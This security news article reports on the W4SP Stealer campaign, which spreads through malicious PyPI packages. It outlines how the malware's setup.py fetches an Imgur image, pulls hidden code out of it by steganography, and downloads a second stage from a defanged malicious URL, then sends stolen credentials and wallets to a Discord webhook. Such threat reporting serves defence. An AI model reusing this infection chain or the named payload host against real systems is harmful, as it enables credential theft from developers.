An ongoing supply chain attack has seen the spread of the W4SP Stealer virus. So far, the malicious Python packages have infected over 100 persons. In a technical write-up, Checkmarx researcher Josef Harush echoes that the threat actor is still active and sending out more malicious packages.
The attacker claims that the malware is undetectable to boost sales. This assault is just the most recent case that poses an increased risk to the software supply chain. The malicious code can steal the victim’s credit cards, crypto wallets, passwords, discord accounts, and other sensitive data on the victim’s PC. Stolen data is then sent back to the attacker via a hard-coded Discord webhook address.
The threat actor offers the WASP stealer for about $20 with another claim that it is ‘heavily’ protected. That being said, the ongoing attacks appear to be financially motivated. Checkmarx investigations kicked off when they obtained reports from Phylum and Check Point. The reports claimed to have spotted tens of W4SP stealers deployed to developer’s systems.
The researchers also noted that the attacks were unique owing to their use of steganography to conceal the polymorphic malware. The malware is hidden within an image file that is hosted on Imgur. Once you install the malicious package, a setup.py script is initiated, and more Python packages are deployed to the victim’s system. These packages include Judy, which allows for steganography utilities to be used.
The setup.py script will then download a .png image from Imgur and save it in the operating system’s temp directory. The script then deploys an ‘Isb. Reveal’ function contained in the Judy package to extract hidden code from the downloaded image.
Once the installed code is executed, it obtains another code from ‘hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4’. The entire process ends when your system is infected with the WASP stealer.
Analyzing the malicious code allowed the expert to come across an open invitation to join the attacker’s Discord server. The server is managed by one user dubbed ‘Alpha.#0001’. The attacker is crafty and creates multiple fake users that appear legitimate while stealing profile descriptions from other popular user accounts. As a result, hundreds of victims have incurred losses due to this campaign.
The same actor has begun operating under the username PyPI (halt) to upload typosquatting libraries. These libraries leveraged the StarJacking technique. For more information on how protect your business today, contact us.